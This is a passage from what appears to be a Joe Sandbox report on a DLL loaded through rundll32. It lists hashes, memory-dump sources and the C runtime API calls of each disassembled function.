              • Instruction ID: afd562df5538cbba07914ef7081aaad4251653abe29e440ad01e48ce1ccfee6b
              • Opcode Fuzzy Hash: 42af1bba095e08f3a14e334087738255b175f57d1233d889ccf1f4d9190aca35
              • Instruction Fuzzy Hash: 9DE14C31E0522A8BCB75CF288D947DDB7B5AF9A300F1581E9C999A7340D671AEC1CF90
              APIs
              • type_info::operator==.LIBVCRUNTIME ref: 6F9E4F49
              • ___TypeMatch.LIBVCRUNTIME ref: 6F9E5057
              • _UnwindNestedFrames.LIBCMT ref: 6F9E51A9
              • CallUnexpected.LIBVCRUNTIME ref: 6F9E51C4
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
              • String ID: csm$csm$csm
              • API String ID: 2751267872-393685449
              • Opcode ID: 4fabeb4c11d48cb0691c48f521481161fa39932734a92640b097eb783114b5c2
              • Instruction ID: dcb7577ef46a413af80cc7edb809be7dd44db4107f8aecf8dffd11f69d67dc73
              • Opcode Fuzzy Hash: 4fabeb4c11d48cb0691c48f521481161fa39932734a92640b097eb783114b5c2
              • Instruction Fuzzy Hash: 18B18879800309EFCF16DFA8D88099EBBB9BF14314F10456AE815AB2D6D731EA51CF91
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 6F9E48C7
              • ___except_validate_context_record.LIBVCRUNTIME ref: 6F9E48CF
              • _ValidateLocalCookies.LIBCMT ref: 6F9E4958
              • __IsNonwritableInCurrentImage.LIBCMT ref: 6F9E4983
              • mydllmain.DLL1(?,00000001), ref: 6F9E499C
              • _ValidateLocalCookies.LIBCMT ref: 6F9E49D8
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_recordmydllmain
              • String ID: csm
              • API String ID: 2845398917-1018135373
              • Opcode ID: 1e01a54927e55d3f9290ce93a6d010125ad1af031cc4b6a2123dd151d90c4721
              • Instruction ID: 21fb42a514ff7f82a3bed27f9cef5fe730e8158c28642f6dcdd3b1be25258db8
              • Opcode Fuzzy Hash: 1e01a54927e55d3f9290ce93a6d010125ad1af031cc4b6a2123dd151d90c4721
              • Instruction Fuzzy Hash: F141A438A00209AFCF01CF6CD880A9EBBB5BF45728F108155D924AB3D2D735EA16CF91
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: _strrchr
              • String ID:
              • API String ID: 3213747228-0
              • Opcode ID: aea14ec4fce50e11b916ea9db58d0fd03005b2f780920c9197a192cf75d5e781
              • Instruction ID: bdf005cc19e2d7ec3f58392d5ed710c38c52e297eee3e145a5f394f74fd62591
              • Opcode Fuzzy Hash: aea14ec4fce50e11b916ea9db58d0fd03005b2f780920c9197a192cf75d5e781
              • Instruction Fuzzy Hash: C6B15872A403559FEB13DF68CC81BAE7BA9EF5A314F164156E804AF2C2D374E801C7A0
              APIs
              • FreeLibrary.KERNEL32(00000000,?,6F9EFB92,6F9E60D4,B586E81C,00000000,6F9EAAAA,00000000,?,6F9EFD0B,00000022,FlsSetValue,6F9FD4F0,ccs,6F9EAAAA), ref: 6F9EFB44
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              • Opcode ID: d33869abf37a2e39349a80122c16a8d929b4ff648a9d224b67a12360d05aa2a0
              • Instruction ID: 8133653013bf0186c70dd80af1c3884fa01e03f410e98773ab18913ab33be5a3
              • Opcode Fuzzy Hash: d33869abf37a2e39349a80122c16a8d929b4ff648a9d224b67a12360d05aa2a0
              • Instruction Fuzzy Hash: 4F21D572A06611E7DB239E65FC50A4A377CEF8277CB194116ED19AB2C4E730F901C6D0
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F9A742C7,6F9EAAAA,?,00000000,6F9FAA10,000000FF,?,6F9EC740,B586E81C,?,6F9EC714,?), ref: 6F9EC7DB
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F9EC7ED
              • mydllmain.DLL1(B586E81C,?,00000000,6F9FAA10,000000FF,?,6F9EC740,B586E81C,?,6F9EC714,?), ref: 6F9EC7FE
              • FreeLibrary.KERNEL32(00000000,?,00000000,6F9FAA10,000000FF,?,6F9EC740,B586E81C,?,6F9EC714,?), ref: 6F9EC80F
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProcmydllmain
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 361333426-1276376045
              • Opcode ID: eab947acee68a7a8a253edc9dd6ad3e8e088a2edcaaa0ab7ef83d3f8f5d4227b
              • Instruction ID: ed39819689001fbccc8f9033173810a13d08aa10c6040bf05aacbddeec0a1a8f
              • Opcode Fuzzy Hash: eab947acee68a7a8a253edc9dd6ad3e8e088a2edcaaa0ab7ef83d3f8f5d4227b
              • Instruction Fuzzy Hash: 61018F31905A1AEBEB128F50CC09BAEBBB8FB44764F004526E822A26C0DB34D901CE90
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b108430ace2ae2e195cb0785f84125f37a562e01eb83432d2d944133b503c69e
              • Instruction ID: 7647802357515487b534f0337983a4b01f546191ea04af5b775c0ba7a625cba5
              • Opcode Fuzzy Hash: b108430ace2ae2e195cb0785f84125f37a562e01eb83432d2d944133b503c69e
              • Instruction Fuzzy Hash: 84B10570A0434AAFDB03EFA8D880BAD7BB5BF5A314F024159E5149B3C2D771E956CB60
              APIs
              • GetLastError.KERNEL32(00000001,?,6F9E4A71,6F9E3517,6F9E2EE4,?,6F9E311C,?,00000001,?,?,00000001,?,6FA01FC8,0000000C,6F9E3215), ref: 6F9E4B01
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F9E4B0F
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F9E4B28
              • SetLastError.KERNEL32(00000000,6F9E311C,?,00000001,?,?,00000001,?,6FA01FC8,0000000C,6F9E3215,?,00000001,?), ref: 6F9E4B7A
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: cc22e5fb2661b7a96bb395338c357357c37926b6c562c8c4442c5527a6c381b8
              • Instruction ID: 4e7cf688260096915d7ed344b17a23e7a0b72cfbf78f7a60fa6dcf1adb68d6ca
              • Opcode Fuzzy Hash: cc22e5fb2661b7a96bb395338c357357c37926b6c562c8c4442c5527a6c381b8
              • Instruction Fuzzy Hash: D401F13A20EB122EE6160DBC6C85B5F37A9FF02778324032EE520852D5EF51D8268954
              Strings
              • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F9F2194
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID:
              • String ID: C:\Windows\SysWOW64\rundll32.exe
              • API String ID: 0-2837366778
              • Opcode ID: 28051e527f8b3cbb9e0592dbd45ff72b5e09849b74fff946af79bc4e041ed96f
              • Instruction ID: 2068e1e1066332e983ce4f34bd2a8899538b73368c6988d1c8951a265d3822cf
              • Opcode Fuzzy Hash: 28051e527f8b3cbb9e0592dbd45ff72b5e09849b74fff946af79bc4e041ed96f
              • Instruction Fuzzy Hash: 5C219031606285AFDB259F75CC80A9A77BDFF153787104528E928DB2C1E731EC1287A0
              APIs
              • __alloca_probe_16.LIBCMT ref: 6F9F70F9
              • __alloca_probe_16.LIBCMT ref: 6F9F71C2
              • __freea.LIBCMT ref: 6F9F7229
                • Part of subcall function 6F9EE7FE: HeapAlloc.KERNEL32(00000000,6F9F26F1,?,?,6F9F26F1,00000220,?,?,?), ref: 6F9EE830
              • __freea.LIBCMT ref: 6F9F723C
              • __freea.LIBCMT ref: 6F9F7249
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: __freea$__alloca_probe_16$AllocHeap
              • String ID:
              • API String ID: 1096550386-0
              • Opcode ID: e2e89a9ea8593e6b0cfd399966976ac5d5411cee2b145226237d4c9289e38e0a
              • Instruction ID: 3a035033afc96f1722e83c0be7949e2cad1da0b987f837512ae3d8f52a39572c
              • Opcode Fuzzy Hash: e2e89a9ea8593e6b0cfd399966976ac5d5411cee2b145226237d4c9289e38e0a
              • Instruction Fuzzy Hash: 5751E7726023066FEB118FA4DC81EEB3AAEEF55714F15012AFD14D61D1EB30EC5287A2
              APIs
              • mydllmain.DLL1(6FA020D0,00000010,6F9E4D45,?,?,?,?,6FA020F0,00000008,6F9E4DC9,?,?,?,00000000), ref: 6F9E4C32
              • ___AdjustPointer.LIBCMT ref: 6F9E4C9A
              • ___AdjustPointer.LIBCMT ref: 6F9E4CBD
              • ___AdjustPointer.LIBCMT ref: 6F9E4D59
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: AdjustPointer$mydllmain
              • String ID:
              • API String ID: 3586548312-0
              • Opcode ID: a97aed2e2f24b6bc476e67e0494d091584efe8357c4061f7de10aaaa154fc8f0
              • Instruction ID: c14818a5ec750cd00fa8f87ca4a09ccd776b0f63d96feb830be4f3c58c92b239
              • Opcode Fuzzy Hash: a97aed2e2f24b6bc476e67e0494d091584efe8357c4061f7de10aaaa154fc8f0
              • Instruction Fuzzy Hash: 1951DD7A644706AFEB2A8F68D840BEA77B9FF44314F10452AD8158B2D1D731F880CF90
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F9E6177
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F9E627E
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F9E6291
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: 5q
              • API String ID: 885266447-1627527040
              • Opcode ID: 4fd9d191c58d79bcdf1769613de63e25729df438f3d71490d2be7c779e85855a
              • Instruction ID: d2e6a76b97a456878d7e59d4998a50ddac5099b96952788c9c33bea20682c7c5
              • Opcode Fuzzy Hash: 4fd9d191c58d79bcdf1769613de63e25729df438f3d71490d2be7c779e85855a
              • Instruction Fuzzy Hash: D1519471A10209AFCF16CF98C940EDEBBB6EF8A314F148159E954AB395D330EE12CB50
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6F9E5BB3,00000000,?,00000001,?,?,?,6F9E5CA2,00000001,FlsFree,6F9FBCD8,FlsFree), ref: 6F9E5C0F
              • GetLastError.KERNEL32(?,6F9E5BB3,00000000,?,00000001,?,?,?,6F9E5CA2,00000001,FlsFree,6F9FBCD8,FlsFree,00000000,?,6F9E4BC8), ref: 6F9E5C19
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6F9E5C41
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID: api-ms-
              • API String ID: 3177248105-2084034818
              • Opcode ID: f3a7936ef8d702ea13330c677b76a87a2ea3cd541a6e0d0fa7ace175b40a3a47
              • Instruction ID: bb9b3e72322580271ff16fafcc9dce7d61706d896de649dfeb7fe008e0c223cc
              • Opcode Fuzzy Hash: f3a7936ef8d702ea13330c677b76a87a2ea3cd541a6e0d0fa7ace175b40a3a47
              • Instruction Fuzzy Hash: EDE04F7128820AB7FF211E64ED06F493B79AF41B55F144020FA0CE80D4EB62E9208A89
              APIs
              • GetConsoleOutputCP.KERNEL32(F9A742C7,00000000,00000000,?), ref: 6F9F09C9
                • Part of subcall function 6F9F2CC5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F721F,?,00000000,-00000008), ref: 6F9F2D26
              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F9F0C1B
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F9F0C61
              • GetLastError.KERNEL32 ref: 6F9F0D04
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
              • String ID:
              • API String ID: 2112829910-0
              • Opcode ID: ee8da23ffb8ad237d983f91d22594d1bbf0df130d2701cfd982eb9402a0e08f6
              • Instruction ID: be717b506e847ebdd8a4899fab936612b21bd204c3155401ad22080883c17d45
              • Opcode Fuzzy Hash: ee8da23ffb8ad237d983f91d22594d1bbf0df130d2701cfd982eb9402a0e08f6
              • Instruction Fuzzy Hash: 71D18AB5D056499FCF01CFA8D8809EDBBB8FF09314F14916AE466AB3A1D730E916CB50
              APIs
              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,6F9F8ACF), ref: 6F9F917C
              • mydllmain.DLL1(00000001,?,?), ref: 6F9F92F0
              • mydllmain.DLL1(00000002,?,?), ref: 6F9F9336
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: mydllmain$DecodePointer
              • String ID:
              • API String ID: 253863441-0
              • Opcode ID: 4ab6d6fe434442ba140f74252297e0d41396fc9a7f8cbc31e2f3a2cf008151f3
              • Instruction ID: 4a631ff00f79ae1f6daa3b14ac59bb601d52ad68c09f487b39f19c2a0100ef4c
              • Opcode Fuzzy Hash: 4ab6d6fe434442ba140f74252297e0d41396fc9a7f8cbc31e2f3a2cf008151f3
              • Instruction Fuzzy Hash: 9751597090660ADBEF109FA9ED483EDBF78BF8A314F018245D590AA2DCCB74D562CB54
              APIs
                • Part of subcall function 6F9F2CC5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F721F,?,00000000,-00000008), ref: 6F9F2D26
              • GetLastError.KERNEL32 ref: 6F9F1A78
              • __dosmaperr.LIBCMT ref: 6F9F1A7F
              • GetLastError.KERNEL32(?,?,?,?), ref: 6F9F1AB9
              • __dosmaperr.LIBCMT ref: 6F9F1AC0
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
              • String ID:
              • API String ID: 1913693674-0
              • Opcode ID: 79a78cb0727e590f74047a1533c07c307691a6679fa9898d480f14385450da65
              • Instruction ID: 7f9164fb7cac6044c892e292e2789cdcb407ab16005dc69322be420e244c422d
              • Opcode Fuzzy Hash: 79a78cb0727e590f74047a1533c07c307691a6679fa9898d480f14385450da65
              • Instruction Fuzzy Hash: 0121D4B1606705AFD7509F76C88095BB7BDFF16368710851AE828972C0E731EC928BD0
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 6F9F2D70
                • Part of subcall function 6F9F2CC5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F721F,?,00000000,-00000008), ref: 6F9F2D26
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F9F2DA8
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F9F2DC8
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
              • String ID:
              • API String ID: 158306478-0
              • Opcode ID: baf4159828b1a641f5f734c50fe31129232d30826f66e0cdaf5c25621d9981a6
              • Instruction ID: 1613eefbff378ab773b0501895d883bd5d73bf501c341c8cdfcdd4f4740115ae
              • Opcode Fuzzy Hash: baf4159828b1a641f5f734c50fe31129232d30826f66e0cdaf5c25621d9981a6
              • Instruction Fuzzy Hash: E21126B15076967FAB129BB59D8CEAF6A6CDF9A2E83100014F901D11C1FB30DE1287B1
              APIs
              • WriteConsoleW.KERNEL32(00000000,00000000,6F9EB4BB,00000000,00000000,?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000), ref: 6F9F82E4
              • GetLastError.KERNEL32(?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000,?,?,?,6F9F1332,00000000), ref: 6F9F82F0
                • Part of subcall function 6F9F82B6: CloseHandle.KERNEL32(FFFFFFFE,6F9F8300,?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000,?,?), ref: 6F9F82C6
              • ___initconout.LIBCMT ref: 6F9F8300
                • Part of subcall function 6F9F8278: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F9F82A7,6F9F694E,?,?,6F9F0D58,?,00000000,00000000,?), ref: 6F9F828B
              • WriteConsoleW.KERNEL32(00000000,00000000,6F9EB4BB,00000000,?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000,?), ref: 6F9F8315
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID:
              • API String ID: 2744216297-0
              • Opcode ID: 30517a3b9dced8703cc48e78c43ef5504f0f25c1bab7312c22cb9a727bd8d13b
              • Instruction ID: a346450a17862f2d572a62213856802eb06effed2dd63387ee0b1c28c125e7fd
              • Opcode Fuzzy Hash: 30517a3b9dced8703cc48e78c43ef5504f0f25c1bab7312c22cb9a727bd8d13b
              • Instruction Fuzzy Hash: B8F01C3650AA15BBCF521F92DC0498D3F76FF0A7F1B088010FA1895164C632D8319F90
              APIs
              • EncodePointer.KERNEL32(00000000,?), ref: 6F9E51F4
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: EncodePointer
              • String ID: MOC$RCC
              • API String ID: 2118026453-2084237596
              • Opcode ID: 7f567eecfe678610b5cef0a2f79b4c9210ae199e2cb6a3cdc72f9ee9efced074
              • Instruction ID: 7181ef55fda0e5629bce5e0589bcddf746c721b565cb50da6ae142922ba2d515
              • Opcode Fuzzy Hash: 7f567eecfe678610b5cef0a2f79b4c9210ae199e2cb6a3cdc72f9ee9efced074
              • Instruction Fuzzy Hash: F3416832A00209AFCF02CFA8CC80AEE7BB9FF49314F148199F915A7291D735E950DB51
              APIs
              • mydllmain.DLL1(00000FA0,-00000020,6F9F033F,6F9F033F,-00000020,00000FA0,00000000,00000000,?,?), ref: 6F9EFD61
              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,6F9F033F,-00000020,00000FA0,00000000,00000000,?,?), ref: 6F9EFD71
              Strings
              • InitializeCriticalSectionEx, xrefs: 6F9EFD41
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
